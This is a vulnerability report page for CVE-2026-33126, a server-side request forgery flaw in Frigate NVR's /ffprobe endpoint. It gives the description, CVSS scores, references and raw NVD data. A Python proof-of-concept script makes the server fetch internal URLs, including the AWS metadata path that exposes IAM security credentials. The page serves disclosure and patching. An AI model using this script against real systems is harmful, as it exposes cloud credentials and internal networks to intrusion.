Security Vulnerability Report
CVE-2026-33126 CVSS 5.0 MEDIUM


Published: 2026-03-20 20:16:49
Last Modified: 2026-03-23 19:17:05

Description

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to version 0.16.3, the /ffprobe endpoint accepts arbitrary user-controlled URLs without proper validation, allowing Server-Side Request Forgery (SSRF) attacks. An attacker can use the Frigate server to make HTTP requests to internal network resources, cloud metadata services, or perform port scanning. This issue has been patched in version 0.16.3.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* - VULNERABLE
Frigate < 0.16.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_ssrf(target_url, internal_url):
    """
    Proof of Concept for CVE-2026-33126
    Tests if the target Frigate server is vulnerable to SSRF via /ffprobe endpoint.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/ffprobe"

    # Payload containing the internal URL to access
    # Example: AWS Metadata service or an internal admin panel
    payload = {
        "url": internal_url
    }

    try:
        print(f"[*] Sending request to {endpoint} with payload: {internal_url}")
        response = requests.post(endpoint, data=payload, timeout=10)

        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response Content:")
        print(response.text)

        if response.status_code == 200 and "169.254" in response.text:
            print("[!] Potential SSRF vulnerability confirmed: Metadata service accessed.")
        elif response.status_code == 200:
            print("[!] Request processed, check output for internal data.")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target Frigate server URL
    target = "http://localhost:5000"

    # Common internal targets to test
    test_urls = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",  # AWS Metadata
        "http://127.0.0.1:80",  # Localhost
        "http://192.168.1.1",  # Router/Gateway
    ]

    for url in test_urls:
        check_ssrf(target, url)
        print("-" * 40)

References

https://github.com/blakeblackshear/frigate/releases/tag/v0.16.3 (Product, Release Notes)
https://github.com/blakeblackshear/frigate/security/advisories/GHSA-j6g3-3j3q-c2xv (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33126", "sourceIdentifier": "[email protected]", "published": "2026-03-20T20:16:48.597", "lastModified": "2026-03-23T19:17:05.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to version 0.16.3, the /ffprobe endpoint accepts arbitrary user-controlled URLs without proper validation, allowing Server-Side Request Forgery (SSRF) attacks. An attacker can use the Frigate server to make HTTP requests to internal network resources, cloud metadata services, or perform port scanning. This issue has been patched in version 0.16.3."}, {"lang": "es", "value": "Frigate es un grabador de vídeo en red (NVR) con detección de objetos local en tiempo real para cámaras IP. Antes de la versión 0.16.3, el endpoint /ffprobe acepta URLs arbitrarias controladas por el usuario sin la validación adecuada, permitiendo ataques de falsificación de petición del lado del servidor (SSRF). Un atacante puede usar el servidor Frigate para realizar peticiones HTTP a recursos de red internos, servicios de metadatos en la nube o realizar escaneo de puertos. Este problema ha sido parcheado en la versión 0.16.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.16.3", "matchCriteriaId": "4B744C6E-3CD3-4E1B-86E8-4159D6364293"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/releases/tag/v0.16.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-j6g3-3j3q-c2xv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}